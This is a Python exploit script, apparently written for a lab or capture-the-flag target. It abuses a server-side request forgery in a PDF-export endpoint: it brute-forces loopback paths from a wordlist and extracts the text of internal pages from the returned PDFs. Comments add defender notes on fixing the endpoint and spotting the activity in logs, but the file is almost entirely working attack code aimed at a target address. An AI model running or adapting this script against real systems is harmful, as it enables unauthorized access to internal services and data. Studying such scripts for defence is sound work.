exploit.py
import requests
import io
import PyPDF2
from main import get_cookie
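# Probe for a server-side request forgery (SSRF) weakness in export2pdf.php.
#
# The script POSTs a `url` form field pointing at loopback addresses
# (http://127.0.0.1/<dir>/<word>/) and reads the text of the PDF that comes
# back, so the page content is presumably fetched and rendered server-side.
#
# Defender notes: the fix belongs in the endpoint. Resolve the submitted URL
# and reject loopback/private destinations, or restrict it to an allowlist.
# In web logs this activity appears as a burst of POSTs to export2pdf.php
# from one session whose `url` values all target 127.0.0.1.

ip = "10.10.240.103" # change to target ip
# Derived from `ip` so the two cannot drift apart when the address is edited.
url = f"http://{ip}/export2pdf.php"
cookie = get_cookie(ip)  # session id supplied by the project-local helper
origin = f"http://{ip}"
referer = f"http://{ip}/index.php"
header = {
    'Host': ip,
    # NOTE(review): looks like a leftover from a captured browser request;
    # requests computes Content-Length from the form body itself. Confirm
    # before relying on this value.
    'Content-Length': "40",
    'Cache-Control': "max-age=0",
    'Upgrade-Insecure-Requests': "1",
    'Origin': origin,
    'Content-Type': "application/x-www-form-urlencoded",
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36",
    'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    'Referer': referer,
    'Accept-Encoding': "gzip, deflate",
    'Accept-Language': "en-US,en;q=0.9",
    'Cookie': f"PHPSESSID={cookie}",
    'Connection': "close"
}
path = ["internal", "backup", "vendor"]

# Read the wordlist once and close the handle; the original left it open.
with open("common.txt", "r", encoding="utf-8", errors="ignore") as wordlist:
    wordlist2 = wordlist.read()
candidates = wordlist2.strip().split()

# The loop variable no longer shadows the `path` list it iterates over.
for directory in path:
    for x in candidates:
        datas = {
            'url': f"http://127.0.0.1/{directory}/{x}/"
        }
        try:
            # A timeout keeps one stalled PDF render from hanging the run.
            response = requests.post(url, headers=header, data=datas, timeout=10)
        except requests.RequestException as exc:
            print(f"/{directory}/{x}: request failed ({exc})")
            continue
        if response.status_code != 200:
            continue

        # NOTE: PdfFileReader / numPages / getPage / extractText are the
        # pre-3.0 PyPDF2 names; PyPDF2 3.x removed them in favour of
        # PdfReader / pages / extract_text. Pin the library version or port.
        pdf_reader = PyPDF2.PdfFileReader(io.BytesIO(response.content))

        # Extract each page once instead of re-parsing it for the printout.
        page_texts = [
            pdf_reader.getPage(page_num).extractText()
            for page_num in range(pdf_reader.numPages)
        ]

        # The endpoint returns 200 with a PDF either way, so the rendered
        # text is what distinguishes a missing page from an existing one.
        if any("Not Found" in text for text in page_texts):
            print(f"Page /{x}: Not Found")
            continue

        for page_num, text in enumerate(page_texts):
            print("=" * 63)
            print(f"/{x} => ")
            print(f"Page {page_num + 1}: {text}")
            print("=" * 63)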